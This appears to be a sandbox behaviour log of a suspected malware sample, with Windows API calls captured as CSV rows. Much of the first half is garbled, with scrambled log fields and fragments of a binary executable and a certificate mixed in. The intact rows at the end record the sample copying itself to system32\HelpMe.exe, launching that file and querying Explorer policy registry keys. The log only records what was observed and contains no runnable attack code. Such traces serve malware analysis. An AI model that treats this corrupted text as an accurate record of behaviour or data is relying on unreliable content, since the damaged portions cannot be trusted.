:(ffe6W
y$!8bc;fc56
+ &cfdm442e
*iz`8110f`3
%5|`74=d"/#
gx##,"demOpy","Virtual@
<!yDx"%"SuACESS","0x00047400","tm52Pro
nu(>He
j,`@dd{ess,
y8!116=000#
jidRizl->54
t;0-"feAlon
1:|nnTppe
<0x00001000"-
6"Dsotlct
<0x00000004"
!6019011441212
du3cebg
}Mi3fc<74
&Ioe44;d6
<90fj24
85d"%"1
qp,gillsySuem","ReadFim
qp-RUCJESs#,"","hFile-?2{400005ec","nN
rv536.:99"-
rs19",+9dd7
*'ad6clb347L+ 30d70bc1g
ds=cd1kffD642dybdca8181
2v<c8dh76
f","~768","fhnfwysqcm","Writy
Dyie->L
fe"oNudbe
0udsTfWr
~d40449"
*#201901112120
et089"%"1
58","9dd688cgg6ceb375`9d51d7
ft142d
3(1N*v4c8dh74
ef0668+,"
? {rted",
SeadFile","ST
PR",+",
iFile->0x000120cc","mJumberOB
4!140"a
212?.3y8
748+,"yeL6
cfe?ce"2
d51m79"b0eg574bd1bf
2va24b
8",+fi
em"%"W
le"%"SuCCESS","","hG
>0x900
0130","nNumbdpOfBytepPoWrite
; 4112	
748+,"
cfe?ce
d51m70
c2fc57
bd1bfe
d6bmca
080fc24b8da75
"17?8(
"fil-s
stem"-
dFiee 
"SUCmESS",""- kFmie->0~00000L
Pudd->
01182120
99"%"175
9dd?8:Cge6c?b376d9d4
bc2oc7
5bd18fdd442d7`dcb<180fc24b8dq
 vlles!
.2VZ 0
Fill","Re
SS"%"",#
e->9x2
1001i0","nNul
fBy}eqtnWri.e->61441 
!60190111212
 <'9dd
d9d<1d
c57=bd
42d?bdCa8180fc24b8d`
","876
","filesystel ,"ReadEmle","S
k|`->08
Numker
sTo[ea
112828
6.399"
"1748#
d681cfE7ceb376d9d51e
2fc<74Be1bfdd442d6be
80fj2>B8da7|4
","177
fills{Stem"
"WriteFhnf&)$SUCCB[S","
MvGyte{
112821
","874
d681cf
76d0d5
e79bc2fc574be
d44;d6Beca8180fc24b9
4d"%"1
68","filesysu
"RehdFIle","SUCCESS#
"hF`lg
>0x0u0000cc"-
mbe{Odbytes
oRead->73700"
%:9;9011u
;t01d7=
7'5J-u
fdd=42
8189fc
744m",
,"f`le
","^riTdFile","SUCCD
"",+hFIme->0x0000012
nNudbeROfBytesToWriu
*"201901112120
99"%"3
48",g9dd688cg
b37?d;D51d7|bc2fc575`g5bfab3<;n6bdc)
.2WeadN
","gNUmc
BytlstoS
79bj2Fc4Ww"
da7=4D"-Brw
8",+fIld
em"%"wrh
le"%"sUB#
,"nGuMbd
ytezTOWs	7%
8;cfeN
4t9d51d79bc2fc454bd1bfdd442d6bgga8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->44<18"
%201108;12:212:.>99""">'483,"9vd%88cre#ueb3 6d9|51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","
8",+9d$7X8I
e6clb3w7f9d51d79bc2
f!`fdd
fc25b8%`?4
","076y#$"A
lesxst$l*,
ritdFi-d*,>
UCCFSS
hFioe-~1p0
001:0"l#
berGfB9u
Wri|e-~3F8"
"2819p0A12
212>.3y8*,"
748*,"yel68
cfe>ce"2?6d
d51l79bb:fc
74bl1bfe
d6bmcax0@0f
24b0daw5Ld
"17>8"l#
sys|emb-ZWr
teFaleb-ZSU
CES[",b#T"R
ile%>081H
130*,".O}mb
rOfByt-r\oW
ite->2~9 
'266988;:212=?6.399""-1748",2(vw"-.tfe6ceb376d9d51d79bc2fc57,{d1bfdd442d"
0!392'
399#,"q6<82
"9de68xbne&
eb366dye=1t
9bc;fcu6<bt
bfde44re>bt
a8190f#36a<ag744d",
mfgFil!
fzux-W",#SUCBMCX},""-"lpDcis
ingNileOimeL>C:TAUTN^XE!.BA\.exd*,"
FildFam
->C2\AUUAEX C.BIT"
B20W9011121392'I399#,"16<%,
"9dm68
bn{8Ieb3>6d
9bc;fc
bfdm44
a8100fc3<b8
a74<d",#976R","nilerqst
m",*Cre`oeF
STXCE>S",*0
01800_30"%"lpGv}n!ame$>C
Run'ex
Des`re
s->NEN
SVRT!EAD+
3/ 2D111;12
3)?8L9",+17
9==)Odd618c
376m9d
c2fj57
dd4=2d
c{rjB180oc2
c'ujL44d+,"
6)))P"fiees
rktf_,"Rlad
hst)R"SUJCE
:,"hNile,30Q)0008130#!"GTumbmrOfCttLhToRmad-??6
":0191<1
/121:6.384"
<1740","8id
'8cfm6cec>7
D9d59d79cn2OB574jd1bgid
2d6jdca9<8
Ec24j8da694M
,"1?68"-/f@Iesy{tem#!"jTeatmFildZ"
SUCKESS#$"?
000901
pFieeN
:\A\TO
F",+dw
dAcjes
ERIJ_R
"20890
126'39
48"%"9
fe6jeb
51d>9b
4bd8bf
6bdja8
4b8ma7
1761",
ystlm"
#ZeAfFilm*,#R]CcFSS"$*"
e->8x0018; 
0",+nN
ljeRMfBy|usUnZeAg->2>("
9019121399'
399;,"
6<))9"9dm68
eb3.6d
9bc+fc
bfdm441e>iu
a81!0f
a74=d"/#9
","oilfrq|
m",+Cr
leW+,"
TMCE6S",*0x018;!
30"5"l
ame$>C:]1ko
88coe6
d9d<1d
c57-bd
42d/bd
fc2=b8
","lwD
Acclsq
>GENDRIC_REAE*
201003
26.399"-*:&
8",+9f
688cge6ceb377l2u
1d70ba
bd1bfdd561`6gbdi1120mo?:m(us$ !r","176/:58}ilesenjzM
gWCF\LFCGe{","SUnmjcb
AS)*>4 :7*$29=Xvv_LO
stem"D
Mz pH;)
xumD2h
I2 hI2(
2!&C <^
<  E2$
c#@V.2
F;sWJ:2
xuAN2h$@2 
_3 FC ||-{d
2!f]d(
r_:	p|
Y3!u[3"
^ftr_:s
a"7b8d)
.20??7#,"rtgi
uzr3-"RevCr
`|jBdyExF",
R]RHDSS"="0
1124","
?HKEY_C
SZEnV_USEV
,#dpsvbKey)
nn}xere\\ic
n{dwp\Wi
rTL|vreneVe
ra~eXExp}or
sTLNqntPoin
r:_Xe20cd69
9810"=06d'17
71=wx\"
01?84121#12
/;(2',"1&48
-*8Ea688cfe
26d9d51
61bC0fc575
d0jfDg442d7
bi1>>0fc#4b
ei<%2d",317
9*#+tegibtr
#$3YcgSeeVa
tmDYQ","SUC
*"","hK
z00002
opValw
`el"9BastCl
r{)=%dwThpe
?9-%%lpDpta
?Lcbqe",3cb
6112121
7&391","17
8#$+6md68)cf
7kns:76d(d5
e?6kj2fc$74
e9smmd44#d6
880fc24
=4d","1
70",(regis
rx*%-YegOaen
dqNi\","BUC
D[\+'"0x!00
19#?),"hZey
?@JdR_CURRE
UWVpNR","lp
tjKeu->Sof
w`zlS@icrnsofuT\xcdowr\CuszjgyVerrion]Mi{aores\Motfuqbints2\CQK_ublume"
#:01701112
<99","
29dd68
gm6Ugb376d9e49d
:bc2fc5
5jd1sfdd4
d7jdcs8180
or744e"
"0?<(6,"rdgiruzy!."RegOpdoCe|GxW",
STBK~kE","Px0018
	%c",FhKex%	
o000P0125*
Key,3{I*0cd692,9h4
411e1-9884-
*6d617278;fUG"
"2008=1
-212126/249
1"1748"-#4dL(88cfe6bdo3
)d9d51d68oc
Fc574bd0ckdL
42d6bdb`51
fc24b8e`:4
G","1769#!"ZAgistry#-/RMBQueryV`mxem^W","SUBBHS{
,"","hJdq$1
x0010012k)=
lpV`lueOidj
12136.
1749",
8cfd6c
c;&=N9d50d7
ck-zI574cd1
2d6cdc
99(/Lc24c8d
,"1768
-*POZtem","
niGz@braryA
-*pcjCESS",
c0000"
#dSp@leName
?[kseL32.dl
019011
d790cfQ6ceb
77e1d5
d79bc2fb=74Td1bfdd45:U
Hdca818
H8da744
68","s
,"Load
hjEYEyA"L"S
BKrkd","Tx7
0",BlpFhd]yYme-Zolf2:/EDl"
"20013
1212126/;
,"1W48"-*
fe5bmU
51d61U@
fc5S4bg0jG\_442
0fcV4b;ei6
d","17
Xegistr
#&"PYgOpenKdxOxW
,"SUCCDR[
>ICM_`CLASSER^ZOO
","lpStcAe{l>Dir
cwnxy"L
930?12s2126.398,,#r748","9ej68|cfe6c
b2=6d|d51d
9ab:fbs74bd1
fel45ud6bdc
8000f+24b8d
e"176:",#
eO#stry
,"Shgg;enKe
rhKey->
`013e",
mxrt3Key->Cus^Ass
"2019181
`12126.285"
q1748",#8hd
l8cfe6
79d51d78ck	G3574bd1
d2d6bdc
7c24b8da6<
_s,"1768"-,re2istry",#Zeg
penKeyEy_",uSUCCESS#$"0 00000127*,"1Key->0x1800j13e","lq[ub
ey->(numd)"Q
"201900912l2126.398*=)$748#, 
dd68;cfe6ceb2?'o,d51e7;
c2fc074bd1bfel44
d6bdc`<180fc2
da75<d"
"1768#("regisDrH","Shgg=enKe9D|W","FA
RE"- !('nLmp'5DFKVO]]PUYIZYZRRRX<3
MRpQGme^
yDJYwO]Um
ZWrZEX^MfliRYQH3
667#)<
/9?$!!
=?=6?2+
CPSU\VVYXXZ^\\Y^BKJVYTFOMBYP_G
puL,ksR
0 MY2!
2!mP3!
fft2g:s.
j0t~<fs
w bQ>kct%{2DwPu
wuj(Tq
,#mr <
f%u.5)n)0v`574
f$5:n&vdca9180gky9
;da644g","1768","refast
y","RegP}er
UalueExW","k
BSESS"
cz@	/:
pCDTpq4
-2lpVaBJ$
"20190
0"7.39/","3748 ,"9gd68:cfe2ceb+76d<d51i79be2fc<74bc1bfhd44:d6bhca8880fo24b2da734d"'"17>8",.reg
strt","DegO
enKgyExG","KAILDRE">"",0hKe{->HjEY_AOCAy_MAAHIN
","apSu!Key/>So6twace\M;cro~oft
Winiows
Curdent
ersbon\<olinies1ExpLore
>201K0118212726.%99"
"17>8",
9dd<88c
e6clb37
d9d#1d7
bc2kc57
bd1Kfdd
42d;bdc
8182fc2
b8dj744
","<768
,"rtgis
ry"."Re
OpeeKey]
W" "SUOCES[","
1 0001
&"lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Expl
3)1011212126.39)","1748","9dd688cfg6cec376d9d51d79bc2fc574bd1bfdd462d6`dca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000140","lpValueName->ForceActiveDesktopOn"
"20190111212126.399","1748","9dd68MZ
!This program cannot be run in DOS mode.
@.rsrc
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
   <0  <$  rsds
SetupResources.pdb
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assemanyp
m5ny=(u
mas-microsofti;N=
"Mman;f
]  <trustInfo xmlnrm
crosogt
om:asm.v
    <Nd
urity>
    !m<!eQu6s
equested
}tionLXw
l level5"asIo;o8eR"su
/@equestedExecuv9znge
 </requestedPqkv9
ecurity>
%ft~nun0
D9N5X7P&D6I+G#A7DzNuXXPADDINGPADDINGXZ
I]F@A,DIN
PADDINGPADDINGXZ
f=7\6E6u6
9$:(:':n;
<O=6=9=
9!:5:M:q
;P;T;X;T;`;
3.4X4XdH5
3n4q4{4g4
4}4q4U4O4[4I4U4Z4
4P4)4-4<484)4"4
4C5H5?5&595
7_:Z:Q:P:,:!:f:L:P:U:
1O2\2^2/2$2l2
3n363Z3
3'4Y4ad
4\464~4v4x4
7W767X7
8m9'9!9=9
9O:>:F;@;F;
5]6&6m626
7c7C7W7
7e8W8S8;8
8k9c949E9
:l;<;P;!;
=&>(>M>X>g>
232Q2H2>2(2
5"6d6w6j6A626{6
z0G0 0/0
0!1y1E1B1=1
5G5V5f5
7.8c8k8Q8+8
91:`;];
<6<:<<<><D<^=
;q<q<6<
>1>?>E>k?
7!8L8m8wh
2y3;3<2N2$2
2$3X3z3|3L3K3
3r3R3!3r3i3`3f3p3y3
4&4+4<4D4J4Vdy4b4F5j4
4i5q5j7g7.7H7
797;8o8x8
;H;[;8;
=@>H>`>
606S6v6
7C8B8;8
9&9I9l9
j:^;K;&;
;l<-<M<m<
>i?(?C?j?
202P2k2
4 5"5#5
5t5K5%5>505
6]6X6,6'6!6
6e7s7I7T7\7]7d7q7R7l7y7q7
7f8b8i8W8T8K858,8(8
8P9_9\979?909x9
9`:o:y:V:H:D:
:+:8:8:3:
:w;};c;x;F;_;
;U;);:;0;
<I<G<Q<+<w<w<p<D<$<
<r=u=v=M=J=[=H=+=1=w=
=i>->z>K>E>J>S>m>j>}>l>T>~>s>
>F?K?]?{?
k0D0J0
0?1Q1B1P1(1
1b2c2s2R2j2:272@2
2z3O3D3X3U3|3
4G4p4$4>4
4u52545%5"5W5
5L6=6*6!6+6
6L7#7.7<717
:!;#;=;0;
=I=D=T=
|0p0E0F0>08000H0
2$3p3p3C3
4A4!4u474
8d8o8o8f8
:w;M;E;
;};u;+;`<%<=<.<
=L>E>E>R>
>v>'>H?
3r4~4K4A4%4
9F9n9<:u:`:|:K:
;6<b<@=@=I=n=1=
=w>h>M>
2}2E2*3
6,7-7%7
7x8m8'878
=u=z=L=(='=
=s>+>;>9>.>
>F?=?0?)?
3|4:404
5U6R6H656;606
6c7c7e73737
7^7W7Y7
788'8!8
8E9N9@9=96959
9d:c:}:`:":%:P:
:8: ;l;
;I;C;H;
<g<Z<V<
<~=7=l=!=4=?=
=i>k>m>
>I?T?I?>?w?/?
~0b0o0`0"0%0P0
0 1"1>1
1:161O1B1]1
2z2?2>2(2
2q3d3u3`3+393
y2}2s2y2N2J2M2G2Q2Z2Y2J2!2*2d2l2:2;232=2@2	2	2
2t3}3e3e3c3q3v323
3y3}3p3y3@3.3o
7}8v8r8[8V8 
5j6,6q6x6A6@6X6E60686
4y5w5|5
5<545s5s5H5P5M5I5^5
5y5d5<595<515=5|5
5j6e6(6
6e6{6j6u6T6P6I6M6
6A6M6X6%6(6$6e
4i5c5`5a5S5
5l6q6f6
6~7^7?7
8:8c8u8A8
9a:(:(:z:{:W:!:h:):
;1;8;$;
;|;8<h<
>5>6>o>a>y>
>p>y>x>
>t?k?Y?Y?U?.?
0.1$1-1?1#1
2d2W2U23202)2-2p2 21292
2 3\3_3T3W3
3R3T3U3\4
4 5n5i5,5t5u5l5}5T5M5M5H5_5G5L5S5*5!5&5l5 5;545)5
5J5L5U5o6U6i6b6C6U6E6O6\6
6p7a7Q7\7/777
9v:e:z:m:|:`:y:2:
:q:|:h:7:;:;:Z;F;
;i<p<q<g<c<q<v<<<K<E<A<G<Y<G<L<]<`<0<=<#<$< <=<5<
<	<@<P<
<r=n=i=y=c=`=q=y=@=G=
=F>B>U>@>L>I>n>d>i>c>
]0U0Y020/0#0)0:0
0r1m1|1m141h1
1r2}2I2J2M2B2
2U2O2%2
2w3<3L3G3G3
4C5M5^5K5U5
7C8Q8V8.8%8
9%:(:$:5:=:
;)<*<-<><t<
< =q===(=5=4=0=
>$>->+>
> ?+?-?(?4?w?y?Q?Y?a?
k0%000U0u0
0n1P1K1Z1Q1@1
2_2Q2W2
2<3)3$3
4'5?59595
5@6W6N6)626!6"6p65696
7v7<7$777	7
7m8<8K8
849)9'959 959
:0;4;<;@;
;Z<]<R<d<)<
<S=A=_=C=
>4>;>(>
>V?E?D?Y?@?
0>1=1+1/1
2{3|3b3w3o3
3e4g4w4H4N4
6^6Q6X6
6i7F7Q7H7
7d7=79707=7
7l8a8m8b8>848R8O8W8
9I:$:!:$: :5:=:2: ;j;
;g;i;b;q;u;J;
=^=Q=X=
=h>d>m>0>H>y>
o0O0L0B0I0\0Y0Y0`010
2.2	292P2z2
3A3n3(31343
3S4!4=4"454
4-5-5?5V5Z5
6.6I6f616(6
6l7h7i7u7
7r7;777
;X8p8.8/8
8G9Q9o9j979%9:9>9
:0:2:=:
Lp:~:};
>4<=<p<X<@<:<L<
=	=O=+=%= =5=
>:>?>'>
>Z?Q?@?	?
{0s0f0)08080
1 2z2i2K25262
3!3b3934393
4X4^4G4
4$5j5e5}5 5$5x5>5
5H6(6v6'6m696
6N7i7a7!7H7
7n8C8M8_8J8
8e9c9]9,9
:$:}:Q:_:
:r;t;S;2;);8;
=L=%=0=l=h=
=J>U>'>!>">
>I?0?k?Y?
t0t0p0H0P0
0}1o1d1V1}1
1h1p191
2F2"252,2\2
2o3s3R3C3,3N3y3y3
3v4A4Z4C4]4
6B6y6n6f6M6D6I6y6Z6^6S6@6D6l6H6P6
nXgEsL~Bp@vPsQy[oxgesl~bp`vpsqy{o
o8g%s,~>p$v
HHSLPPYTH\Y`
8h9xQ}
56#e ;;
o_@IFY_X4
|AR^^C^RE
y/@.r1)7
V:_id;w;:Y
h,Z<5"A;d
r>}:{<
*c-"19M
M hkU|
MOdR{HqNe
P?h9];
y<koq4t,p.
0!<!8(
=;;h8;S?
[c\0O02R
h1{bx=
Y>Wm\>O:5kU+X)j;%<|+ro
vyXfTkTzO
xCI@TFZLRSUp
3http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H
,http://www.microsoft.com/pki/certs/CSPCA.crt0
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
060916010447Z
190915070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Timestamping PCA0
ipfx'f
N+"\hE
flAllocationType->0x00001000","flProtect->0x00000040"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000008c","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->268"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000084","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->43574"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->43574"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","OpenMutexW","SUCCESS","0x00000098","dwDesiredAccess->0x00120001","lpName->ShimCacheMutex"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000a4","hKey->0x000000a8","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000a4","lpValueName->Cache"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77dd0000","lpFileName->advapi32.dll"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateProcessInternalW","SUCCESS","612","lpApplicationName->(null)","lpCommandLine->C:\WINDOWS\system32\HelpMe.exe"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","WinExec","SUCCESS","","lpCmdLine->C:\WINDOWS\system32\HelpMe.exe"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->268"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","FAILURE","","lpFileName->C:\DOCUME~1\JANETT~1\LOCALS~1\Temp\\
// Include file for object and counters definitions.
//","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00280000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000004"
